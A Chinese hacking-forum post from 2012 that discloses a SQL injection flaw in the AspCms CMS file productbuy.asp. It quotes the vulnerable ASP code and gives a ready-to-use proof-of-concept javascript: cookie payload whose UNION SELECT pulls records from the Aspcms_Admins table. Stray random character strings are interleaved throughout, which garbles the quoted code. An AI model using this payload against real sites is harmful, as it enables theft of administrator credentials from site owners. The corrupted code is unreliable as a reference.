好久没上土司了,上来一看发现在删号名单内....." _) t/ n k8 j# \% Q' M; Y
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
' E0 t" X, F" ?/ h9 z废话不多说,看代码:
8 k. w$ J' X* Y+ k# t' Y: I& V5 u
<%
% n# k7 r3 b+ k2 B" u0 x4 E
. Y1 V/ d8 x/ bif action = "buy" then
4 N% T4 K: O X( V
9 P; Z- S% _6 u$ { addOrder()
/ c4 J+ Q0 k c& x$ Q+ H5 u
' V6 D8 r" A& Q9 f1 D$ relse
7 \/ h2 d8 ?- n* ^( t1 `- X; h8 d6 d3 q6 h
echoContent()
+ v: F3 n7 ~9 e" A% H
8 Q+ T* ~5 l: p! ~; Y4 ]8 n0 u6 Yend if
& B7 R4 R5 S l/ q) J3 Y$ {) ~- B3 S' [* @* p
: y3 T* W/ [! `5 W* \/ O' Y: D! P
6 |1 [4 S2 j; F* _3 a9 i
……略过% y# c: }* k5 I# {
7 ]: }: e0 o3 w/ @: s8 Y. W' c3 i' N W- G( S; }' D+ K
2 H0 z) _& n/ {: t+ M# j; @Sub echoContent()4 m6 e& n+ K- n6 x' O- U
( s4 @# V& R- b( }/ V& w# }
dim id
+ x6 A$ n) q0 s7 U
( X, M' n8 A& p id=getForm("id","get") t; o0 l* y$ K; R" u% E' X
* ^ v, A3 D2 N& |/ Y& O+ D
+ @" D! d! K9 y. I
4 X5 X& U: \. [! m" ?$ J3 w1 ~ if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
' |. ]2 O* n" ^% {( {9 f) U% s3 a* z! P8 y6 k4 P
8 E% X% G3 {6 t; M8 b# c
$ M6 _$ f5 I# H dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
! @* Y0 u. w: U0 ]7 O5 T
/ L# ?- D" p$ ^9 L+ j9 f# i; ] dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct5 a7 L) E4 s) P6 D0 @% I3 [
( v4 n' \# ]& Z1 ?* E& X' m$ x
Dim templatePath,tempStr$ p7 t/ z! @/ O& b. u6 w
/ k; V& Q0 Q" ^; j; L4 }, p templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"* G- D, _& b+ s4 n8 A4 E. ]' q) D; u
# {, f7 V% x' p7 k- O1 y
' X: `& Q& V3 j' c2 f$ Z0 I3 m6 a/ M2 }5 m
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
) h6 R* a) Q; i0 w$ g1 L
0 j" @2 H9 C* c. M- y2 [ selectproduct=rsObj(0)
# n5 Y, l* V. G! B0 J7 A+ z& J$ G2 e: b1 \3 ~+ E/ t8 D0 `
* M1 V; M/ E$ `3 V2 k
6 B; m* G: r) _+ u5 t; L
Dim linkman,gender,phone,mobile,email,qq,address,postcode
) [) O: j3 [# J
% y% h) q: R- H9 J if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0+ }; {# E0 m% F+ q- d
# ~+ a- e& o; _ @9 y
if rCookie("loginstatus")=1 then
) K4 u4 b1 a8 s1 q1 }1 H5 @5 H. K3 F& f" Q( c
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")& m2 l, c4 {! K: I4 m
% R1 ?7 g T$ n: Y/ U linkman=rsObj("truename")% i1 S7 g) l% p* L
" {4 |7 R/ Z% m8 I, I
gender=rsObj("gender"): H5 \+ [: A0 t3 R
D2 a( B5 U7 m) n% I1 G phone=rsObj("phone")
, `5 z) ?! }6 ~; b( c$ }$ q+ F6 ?
mobile=rsObj("mobile")
( X" g0 o* P' x9 b* R) ~3 H' d& G2 T- B3 G- g
email=rsObj("email")
; h& N; ^8 o; m2 g1 k7 d' X9 q
5 H- k5 E3 b1 R2 X. ?( ^1 [ K% X qq=rsObj("qq")) b" A. Q7 C* ~4 J3 Z5 |5 v
) n. ~# S& c1 L+ j5 r" a, _ address=rsObj("address")
1 \4 q; b- q4 c$ `+ w% p6 A1 Z1 N. o
1 S6 i4 v% g7 D3 u& R: Z* h postcode=rsObj("postcode")0 Q- x2 [/ P5 w% G+ f6 ~1 K
, H) W$ z0 J# o' E4 t& ?/ s$ A) R4 n- V else ; {5 V8 N8 v4 f+ Z, U* t
5 b' D" X9 y/ ^& e+ m1 x
gender=1
2 m, E$ x z/ q
% O* H% ^* d2 t4 ?. X: X9 E% B/ D end if
. V) c4 y! u$ A+ e; G: f& k C% W( a5 x% w+ p" u6 ^: |
rsObj.close()5 J: g6 ?- |* a0 M3 R) m
" u' |8 j& G- ?. y) y& Q2 g( H( B
0 g+ A* i+ ]# O
; Z' X; _% Y0 t' y+ v7 R( d
with templateObj / C% U% @9 O5 j+ C
) L2 X2 w: o, F- S .content=loadFile(templatePath)
% P( j8 |3 O6 B: Q% H, b. \0 C; l" v# k, e& N
.parseHtml()
# a4 R6 T9 \# h, S4 o2 U' |: u4 o% q: p% X2 u! I: i3 D3 X, u1 n- L! V
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
6 p0 G' q6 v% a- O# _4 N& V5 M) [! T; [; `$ L2 R
.content=replaceStr(.content,"[aspcms:linkman]",linkman) ) ~8 q& v' n# \1 A: T7 I5 t* [
F" v' d: z; f: L, T- M) A .content=replaceStr(.content,"[aspcms:gender]",gender) , g! `$ C8 d1 m( B
7 {7 z# N+ e% z Z .content=replaceStr(.content,"[aspcms:phone]",phone) $ V$ y# d/ I# r: W1 l- U7 x
( s5 Q9 c; i, ] R .content=replaceStr(.content,"[aspcms:mobile]",mobile) 1 l) ~, r4 _8 M
) `! h1 B+ v7 Z- B6 N4 e5 o) ?# D .content=replaceStr(.content,"[aspcms:email]",email)
4 l$ ~ s U. ^3 |& ^
& s* K0 R* b" z .content=replaceStr(.content,"[aspcms:qq]",qq)
" H8 R1 B! i/ d5 Y Y; s5 q8 q- m z4 ], ?6 R# C' w L
.content=replaceStr(.content,"[aspcms:address]",address)
{ t5 S: \" z7 y) Z- ~
- n( s/ Z4 D6 J# D! C4 i .content=replaceStr(.content,"[aspcms:postcode]",postcode) 0 A; x$ V) ]3 F; e/ @- q1 [
9 z# V% B6 J% \% } .parseCommon()
( J' J m! N ~/ c( Y3 h7 Q0 B7 e+ m) }8 a' I
echo .content
( s, O' U1 S/ Q! L* B5 F& Z* ]0 N7 p! r! a+ k
end with
" b8 I: O8 f9 t! B. _1 i" y$ |& d3 u S
set templateobj =nothing : terminateAllObjects
8 U2 |/ X: D; p4 p3 m7 ^9 x" _; H+ V. T+ x
End Sub7 e4 S" a7 p- ]3 i& ?. X' g
漏洞很明显,没啥好说的
* R6 e. W6 H6 X& ^& b. f8 Zpoc:
1 C1 e( x! {* I9 ?$ Q
* R$ O2 c; s5 y3 I# ]javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子" v: J% E: N# m0 E$ |3 b, J
8 G4 {; O0 x2 n, a$ G5 }0 k
|
发表于 2012-12-27 08:35:05
收藏
支持
反对